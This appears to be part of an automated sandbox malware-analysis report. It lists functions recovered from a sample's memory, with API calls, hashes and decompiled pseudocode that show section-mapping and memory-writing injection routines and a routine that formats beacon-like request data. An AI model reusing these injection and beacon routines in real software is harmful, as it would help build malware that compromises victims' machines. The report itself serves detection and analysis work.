                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: 5698662d1410b0d66cf2e5a89a4bd9a1f10112de5ab0ceeb8455f7d8b1d1a53f
                              • Instruction ID: 6ce940c8fa6097ced3e01c46bc9a68abf422d4449afb33f38ba5ca4d939592d3
                              • Opcode Fuzzy Hash: 5698662d1410b0d66cf2e5a89a4bd9a1f10112de5ab0ceeb8455f7d8b1d1a53f
                              • Instruction Fuzzy Hash: 6C21FA72A10219BBDB11AF95DC4AADEBFBDEF08740F104066F905FA250D7729A449BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DD9F4, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 053DDA1F
                              • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 053DDA2C
                              • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 053DDAB8
                              • GetModuleHandleA.KERNEL32(00000000), ref: 053DDAC3
                              • RtlImageNtHeader.NTDLL(00000000), ref: 053DDACC
                              • RtlExitUserThread.NTDLL(00000000), ref: 053DDAE1
                                • Part of subcall function 053D22F0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,053DDA5A,?), ref: 053D22F8
                                • Part of subcall function 053D22F0: GetVersion.KERNEL32 ref: 053D2307
                                • Part of subcall function 053D22F0: GetCurrentProcessId.KERNEL32 ref: 053D231E
                                • Part of subcall function 053D22F0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 053D233B
                                • Part of subcall function 053CE0B6: memcpy.NTDLL(00000000,?,?,?), ref: 053CE115
                                • Part of subcall function 053E4BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,053C3E20), ref: 053E4BF0
                                • Part of subcall function 053C54B6: GetModuleHandleA.KERNEL32(?,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C54D7
                                • Part of subcall function 053C54B6: GetProcAddress.KERNEL32(00000000,?), ref: 053C54F0
                                • Part of subcall function 053C54B6: OpenProcess.KERNEL32(00000400,00000000,053D3B88,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C550D
                                • Part of subcall function 053C54B6: IsWow64Process.KERNEL32(00000000,00000000,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C551E
                                • Part of subcall function 053C54B6: CloseHandle.KERNEL32(00000000,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C5531
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
                              • String ID:
                              • API String ID: 3675227105-0
                              • Opcode ID: 8336cc941be8d0fa346ecff513aee9b7043b07ffacf0bcfd9f0969680689dd9b
                              • Instruction ID: 4106e4439f3e665b29f6efff44e2ec54cf8b08a4a76c0fc2485281ce0ce6a9a4
                              • Opcode Fuzzy Hash: 8336cc941be8d0fa346ecff513aee9b7043b07ffacf0bcfd9f0969680689dd9b
                              • Instruction Fuzzy Hash: F7318672A14114AFC721EF64EC89EBEBBB9FB44750F148565F502EF241DA789D40C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CD551, Relevance: 7.7, APIs: 5, Instructions: 227nativeCOMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(053D3C59,053C6017,00000800,053D3C99,053D3C99,?,00000000), ref: 053CD78F
                                • Part of subcall function 053C9704: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,053CD660,?,?,053D3C99,?,00000000), ref: 053C9729
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C974B
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C9761
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C9777
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C978D
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C97A3
                                • Part of subcall function 053C3EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,053D96AE,00000000,00000000,053D96AE,?,00000002,00000000,?,?,00000000,053D96AE,000000FF,?), ref: 053C3EE5
                                • Part of subcall function 053E5F28: memcpy.NTDLL(575653E8,575653F0,?,?,053D3C99,?,?,?,?,?,053D3C99,?,00000000), ref: 053E5F8E
                                • Part of subcall function 053E5F28: memcpy.NTDLL(?,?,?), ref: 053E5FED
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,053D3C99,?,00000000), ref: 053CD6BF
                              • memcpy.NTDLL(053D3CB1,?,00000018,?,?,?,?,?,?,?,053D3C99,?,00000000), ref: 053CD70B
                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 053CD7CD
                              • memset.NTDLL ref: 053CD7F5
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                              • String ID:
                              • API String ID: 1575695328-0
                              • Opcode ID: f80640fe5dc66fdf6764134b33ec2d006c29c5f0f333260195c0f92a84f5ab55
                              • Instruction ID: 1a9b7711012163a85f82d07ffa0a4e194302af1978b3e8f86d57d21004f40520
                              • Opcode Fuzzy Hash: f80640fe5dc66fdf6764134b33ec2d006c29c5f0f333260195c0f92a84f5ab55
                              • Instruction Fuzzy Hash: AD9139B5A00249EFCB11DF98C984BAEBBF5FF08304F1449ADE815A7650E771AE54CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D963A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtCreateSection.NTDLL(053D3C99,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 053D9697
                                • Part of subcall function 053C3EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,053D96AE,00000000,00000000,053D96AE,?,00000002,00000000,?,?,00000000,053D96AE,000000FF,?), ref: 053C3EE5
                              • memset.NTDLL ref: 053D96BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID: @
                              • API String ID: 2533685722-2766056989
                              • Opcode ID: c8d4de2ac11249e1ae9eabbe1a4e3da229fd7d78a7802e593786f5aabba29f71
                              • Instruction ID: dee23430116bd53926aca90c895c1b4d02a717fa68ec73b376c4fb172a92c24a
                              • Opcode Fuzzy Hash: c8d4de2ac11249e1ae9eabbe1a4e3da229fd7d78a7802e593786f5aabba29f71
                              • Instruction Fuzzy Hash: 06213BB2D00209AFCB01DFA9C8849EEFBB9EF08364F104529E515F3650D7319A448B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E67CD, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcAddress.KERNEL32(?,00000318), ref: 053E67F2
                              • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 053E680E
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                                • Part of subcall function 053D1635: GetProcAddress.KERNEL32(?,00000000), ref: 053D165E
                                • Part of subcall function 053D1635: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,053E684F,00000000,00000000,00000028,00000100), ref: 053D1680
                              • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 053E6978
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                              • String ID:
                              • API String ID: 3547194813-0
                              • Opcode ID: 22988fbaf9e1605798418f7d62f34c165cd31ce3ac64aae0d0b8d8cceeb97ca1
                              • Instruction ID: 76cd63cf366cc42b4aba6daa3eca007e9374863a2a7231f248ab548061d3ea18
                              • Opcode Fuzzy Hash: 22988fbaf9e1605798418f7d62f34c165cd31ce3ac64aae0d0b8d8cceeb97ca1
                              • Instruction Fuzzy Hash: 7F614F71A0021AAFDF14CFA5D981BAEBBF5FF18300F144129E955EB281D770EA55CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DC51B, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 053DC52F
                              • GetProcAddress.KERNEL32(?), ref: 053DC557
                              • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 053DC575
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressInformationProcProcess64QueryWow64memset
                              • String ID:
                              • API String ID: 2968673968-0
                              • Opcode ID: d25e7f07ca612dacec48a4d9ee30efce1217530ac3619d83c47911270a6b462a
                              • Instruction ID: 8bd66b333051ea0eb95538b8c0708c266c38a77333dab9e6bf6bc6dd1b7c886c
                              • Opcode Fuzzy Hash: d25e7f07ca612dacec48a4d9ee30efce1217530ac3619d83c47911270a6b462a
                              • Instruction Fuzzy Hash: F0113D32A20119AFDB14DB99EC49F9DBBB9BB45744F040025B905EB291EB70EA05CBB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D09CA, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(053CC119,00000000,00000000,053CC119,00003000,00000040), ref: 053D09FB
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 053D0A02
                              • SetLastError.KERNEL32(00000000), ref: 053D0A09
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Error$AllocateLastMemoryStatusVirtual
                              • String ID:
                              • API String ID: 722216270-0
                              • Opcode ID: 6d5d1fb70f9bde219a2ec25e150819e02b3ae3bc5fd54315dc442d868604fba7
                              • Instruction ID: 92ff5c7d9b566554a895fdd51fe96d4a4d70b6249009d530aedd6de652301910
                              • Opcode Fuzzy Hash: 6d5d1fb70f9bde219a2ec25e150819e02b3ae3bc5fd54315dc442d868604fba7
                              • Instruction Fuzzy Hash: 9AF0F471521309FBEB15CF94D95EF9DBBBCAB14715F104048B501AA1C0EBB8AB04D765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E4FEA, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000004,?,?,?,74786780,?,053DFDBE,?,00000004,?,00000004,?), ref: 053E5008
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 053E5017
                              • SetLastError.KERNEL32(00000000,?,053DFDBE,?,00000004,?,00000004,?,?,?,?,053D3C11,?,?,CCCCFEEB,?), ref: 053E501E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Error$LastMemoryStatusVirtualWrite
                              • String ID:
                              • API String ID: 1089604434-0
                              • Opcode ID: 23214b8978201f8c7ca56cc3769f5e81312f6596ed54a47cdbc07d60865fdcd3
                              • Instruction ID: bd2666cb1dee6897b05d826ba8b5d370332b21f472a5b3c610de7ef7afa6b7fc
                              • Opcode Fuzzy Hash: 23214b8978201f8c7ca56cc3769f5e81312f6596ed54a47cdbc07d60865fdcd3
                              • Instruction Fuzzy Hash: 79E0123221012AABCF125ED49D09D8E7FDDAB08751F004010BA01DA151CB35D861ABE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D7562, Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 72%
                              			E049D7562(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E049D65B4(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                              0x049d756b
                              0x049d7572
                              0x049d7573
                              0x049d7574
                              0x049d7575
                              0x049d7576
                              0x049d7587
                              0x049d758b
                              0x049d759f
                              0x049d75a2
                              0x049d75a5
                              0x049d75ac
                              0x049d75af
                              0x049d75b6
                              0x049d75b9
                              0x049d75bc
                              0x049d75bf
                              0x049d75c4
                              0x049d75ff
                              0x049d75c6
                              0x049d75c9
                              0x049d75cf
                              0x049d75d4
                              0x049d75d8
                              0x049d75f6
                              0x049d75da
                              0x049d75e1
                              0x049d75ef
                              0x049d75ef
                              0x049d75d8
                              0x049d7607

                              APIs
                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,049D6DA4), ref: 049D75BF
                                • Part of subcall function 049D65B4: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,049D75D4,00000002,00000000,?,?,00000000,?,?,049D75D4,00000000), ref: 049D65E1
                              • memset.NTDLL ref: 049D75E1
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID:
                              • API String ID: 2533685722-0
                              • Opcode ID: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                              • Instruction ID: 82aab2f71accfbc2e548d50acb789f5913c6d5b3e030e2e07b9fd0bf2754f584
                              • Opcode Fuzzy Hash: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                              • Instruction Fuzzy Hash: 71210BB5D00209AFDB11DFA9C8849DEFBB9EB48354F108879E605F3210D731AA448BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D1635, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcAddress.KERNEL32(?,00000000), ref: 053D165E
                              • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,053E684F,00000000,00000000,00000028,00000100), ref: 053D1680
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressMemory64ProcReadVirtualWow64
                              • String ID:
                              • API String ID: 752694512-0
                              • Opcode ID: c6707dc516c360aab3609061ed625cfcdaee51289fd099e85f1b8c7932e1197b
                              • Instruction ID: 9ce18ce0678e3aa7d19db55a1a536f76fa68ad181fdc72ce3722bb935c1d89dd
                              • Opcode Fuzzy Hash: c6707dc516c360aab3609061ed625cfcdaee51289fd099e85f1b8c7932e1197b
                              • Instruction Fuzzy Hash: 5CF04472210109BFCB068F8AEC49C9EBFBEFB84350B04401AF905CA120DBB1EA50DB30
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D65B4, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E049D65B4(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                              0x049d65c6
                              0x049d65cc
                              0x049d65da
                              0x049d65e1
                              0x049d65e6
                              0x049d65ec
                              0x00000000
                              0x049d65ed
                              0x00000000

                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,049D75D4,00000002,00000000,?,?,00000000,?,?,049D75D4,00000000), ref: 049D65E1
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction ID: 4c1391f617d3c1be52198eedfd0c4c7d9e50065c8d58fce37eba6db2a1bae30c
                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction Fuzzy Hash: C1F012B590020CBFDB119FA5CC85C9FBBBDEB44354F108939F152E1094D631AE489A60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C3EB7, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,053D96AE,00000000,00000000,053D96AE,?,00000002,00000000,?,?,00000000,053D96AE,000000FF,?), ref: 053C3EE5
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction ID: 05aa91cbe2e8b60658d0035be59f3279197a2d990c85e4e86d4e417fa825349e
                              • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction Fuzzy Hash: 97F012B690020CFFDB119FA5CC85CDFBFBDEB48284B008C6AF552D2450D6719E189B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E4582, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000000,053CB24B,00000018,00000000,053F0460), ref: 053E4599
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 0fc803fabdbbbe1cb7504842dec17b34cdf258960085cb016b77a51a8ef95e5d
                              • Instruction ID: 780798e0737947d14f7f34a682552083788d179bd762b0b29a6702711f73f572
                              • Opcode Fuzzy Hash: 0fc803fabdbbbe1cb7504842dec17b34cdf258960085cb016b77a51a8ef95e5d
                              • Instruction Fuzzy Hash: CDF03A313001269BCB20CA59C845DAABBE8EB09754B108514E901DB6D1D7B0E90ACBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6367, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 180memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E049D6367(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a16, void* _a24, intOrPtr _a32, void* _a40) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v52;
				void* __edi;
				long _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t57;
				intOrPtr* _t59;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t78;
				int _t81;
				void* _t83;
				void* _t84;
				void* _t88;
				intOrPtr _t90;
				long _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				int _t95;
				void* _t96;
				void* _t97;
				void* _t100;
				void* _t102;

				_t88 = __edx;
				_t84 = __ecx;
				_t30 = __eax;
				_t100 =  &_v12;
				_t83 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t30 = GetTickCount();
				}
				_t31 =  *0x49dd018; // 0x9945a377
				asm("bswap eax");
				_t32 =  *0x49dd014; // 0x3a87c8cd
				asm("bswap eax");
				_t33 =  *0x49dd010; // 0xd8d2f808
				asm("bswap eax");
				_t34 =  *0x49dd00c; // 0x13d015ef
				asm("bswap eax");
				_t35 =  *0x49dd2b8; // 0xe3a5a8
				_t3 = _t35 + 0x49de633; // 0x74666f73
				_t95 = wsprintfA(_t83, _t3, 2, 0x3f87e, _t34, _t33, _t32, _t31,  *0x49dd02c,  *0x49dd004, _t30);
				_t38 = E049D8DA6();
				_t39 =  *0x49dd2b8; // 0xe3a5a8
				_t4 = _t39 + 0x49de673; // 0x74707526
				_t42 = wsprintfA(_t95 + _t83, _t4, _t38);
				_t102 = _t100 + 0x38;
				_t96 = _t95 + _t42; // executed
				_t43 = E049D40AC(_t84); // executed
				_a32 = _t43;
				if(_t43 != 0) {
					_t78 =  *0x49dd2b8; // 0xe3a5a8
					_t7 = _t78 + 0x49de8b2; // 0x736e6426
					_t81 = wsprintfA(_t96 + _t83, _t7, _t43);
					_t102 = _t102 + 0xc;
					_t96 = _t96 + _t81;
					HeapFree( *0x49dd270, 0, _a40);
				}
				_t44 = E049D8941();
				_a32 = _t44;
				if(_t44 != 0) {
					_t74 =  *0x49dd2b8; // 0xe3a5a8
					_t11 = _t74 + 0x49de885; // 0x6f687726
					wsprintfA(_t96 + _t83, _t11, _t44);
					HeapFree( *0x49dd270, 0, _a40);
				}
				_t90 =  *0x49dd35c; // 0x58195b0
				_t46 = E049D3FB8(0x49dd00a, _t90 + 4);
				_t92 = 0;
				_a8 = _t46;
				if(_t46 != 0) {
					_t49 = RtlAllocateHeap( *0x49dd270, 0, 0x800); // executed
					_a24 = _t49;
					if(_t49 != 0) {
						E049D47EF(GetTickCount());
						_t53 =  *0x49dd35c; // 0x58195b0
						__imp__(_t53 + 0x40);
						asm("lock xadd [eax], ecx");
						_t57 =  *0x49dd35c; // 0x58195b0
						__imp__(_t57 + 0x40);
						_t59 =  *0x49dd35c; // 0x58195b0
						_t97 = E049DA7FB(1, _t88, _t83,  *_t59);
						asm("lock xadd [eax], ecx");
						if(_t97 != 0) {
							StrTrimA(_t97, 0x49dc2ac);
							_push(_t97);
							_t65 = E049D6F6D();
							_v20 = _t65;
							if(_t65 != 0) {
								_t93 = __imp__;
								 *_t93(_t97, _v0);
								 *_t93(_a4, _v20);
								_t94 = __imp__;
								 *_t94(_v4, _v32);
								 *_t94(_v12, _t97);
								_t71 = E049D3B55(0xffffffffffffffff, _v20, _v28, _v24); // executed
								_v52 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E049D55F1();
								}
								RtlFreeHeap( *0x49dd270, 0, _v48); // executed
								_t92 = 0;
							}
							HeapFree( *0x49dd270, _t92, _t97);
						}
						RtlFreeHeap( *0x49dd270, _t92, _a16); // executed
					}
					HeapFree( *0x49dd270, _t92, _v0);
				}
				RtlFreeHeap( *0x49dd270, _t92, _t83); // executed
				return _a4;
			}














































                              0x049d6367
                              0x049d6367
                              0x049d6367
                              0x049d6367
                              0x049d636d
                              0x049d6374
                              0x049d637c
                              0x049d637e
                              0x049d637e
                              0x049d638b
                              0x049d6396
                              0x049d6399
                              0x049d63a4
                              0x049d63a7
                              0x049d63ac
                              0x049d63af
                              0x049d63b4
                              0x049d63b7
                              0x049d63c3
                              0x049d63d0
                              0x049d63d2
                              0x049d63d8
                              0x049d63dd
                              0x049d63e8
                              0x049d63ea
                              0x049d63ed
                              0x049d63ef
                              0x049d63fc
                              0x049d6400
                              0x049d6403
                              0x049d6408
                              0x049d6413
                              0x049d6415
                              0x049d641c
                              0x049d6426
                              0x049d6426
                              0x049d6428
                              0x049d642f
                              0x049d6433
                              0x049d6436
                              0x049d643b
                              0x049d6445
                              0x049d6456
                              0x049d6456
                              0x049d6458
                              0x049d6466
                              0x049d646b
                              0x049d646f
                              0x049d6473
                              0x049d6485
                              0x049d648d
                              0x049d6491
                              0x049d649d
                              0x049d64a2
                              0x049d64ab
                              0x049d64bc
                              0x049d64c0
                              0x049d64c9
                              0x049d64cf
                              0x049d64dc
                              0x049d64e9
                              0x049d64ef
                              0x049d64fb
                              0x049d6501
                              0x049d6502
                              0x049d6509
                              0x049d650d
                              0x049d6513
                              0x049d651a
                              0x049d6524
                              0x049d652a
                              0x049d6534
                              0x049d653b
                              0x049d6549
                              0x049d6550
                              0x049d6554
                              0x049d655d
                              0x049d655d
                              0x049d656e
                              0x049d6570
                              0x049d6570
                              0x049d657a
                              0x049d657a
                              0x049d6587
                              0x049d6587
                              0x049d6594
                              0x049d6594
                              0x049d659e
                              0x049d65ab

                              APIs
                              • GetTickCount.KERNEL32 ref: 049D637E
                                • Part of subcall function 049DA7FB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,049D64DC,?,058195B0), ref: 049DA826
                                • Part of subcall function 049DA7FB: lstrlen.KERNEL32(?,?,74785520,049D64DC,?,058195B0), ref: 049DA82E
                                • Part of subcall function 049DA7FB: strcpy.NTDLL ref: 049DA845
                                • Part of subcall function 049DA7FB: lstrcat.KERNEL32(00000000,?), ref: 049DA850
                                • Part of subcall function 049DA7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,049D64DC,?,74785520,049D64DC,?,058195B0), ref: 049DA86D
                              • wsprintfA.USER32 ref: 049D63CB
                              • wsprintfA.USER32 ref: 049D63E8
                              • wsprintfA.USER32 ref: 049D6413
                              • HeapFree.KERNEL32(00000000,?), ref: 049D6426
                              • wsprintfA.USER32 ref: 049D6445
                              • HeapFree.KERNEL32(00000000,?), ref: 049D6456
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049D6485
                              • GetTickCount.KERNEL32 ref: 049D6497
                              • RtlEnterCriticalSection.NTDLL(05819570), ref: 049D64AB
                              • RtlLeaveCriticalSection.NTDLL(05819570), ref: 049D64C9
                              • StrTrimA.SHLWAPI(00000000,049DC2AC,?,058195B0), ref: 049D64FB
                                • Part of subcall function 049D6F6D: lstrlen.KERNEL32(05819B58,00000000,00000000,?,049D6507,00000000), ref: 049D6F7D
                                • Part of subcall function 049D6F6D: lstrlen.KERNEL32(?), ref: 049D6F85
                                • Part of subcall function 049D6F6D: lstrcpy.KERNEL32(00000000,05819B58), ref: 049D6F99
                                • Part of subcall function 049D6F6D: lstrcat.KERNEL32(00000000,?), ref: 049D6FA4
                              • lstrcpy.KERNEL32(00000000,?), ref: 049D651A
                              • lstrcpy.KERNEL32(?,?), ref: 049D6524
                              • lstrcat.KERNEL32(?,?), ref: 049D6534
                              • lstrcat.KERNEL32(?,00000000), ref: 049D653B
                              • RtlFreeHeap.NTDLL(00000000,?,?,?,?), ref: 049D656E
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049D657A
                              • RtlFreeHeap.NTDLL(00000000,?,?,058195B0), ref: 049D6587
                              • HeapFree.KERNEL32(00000000,?), ref: 049D6594
                              • RtlFreeHeap.NTDLL(00000000,?), ref: 049D659E
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
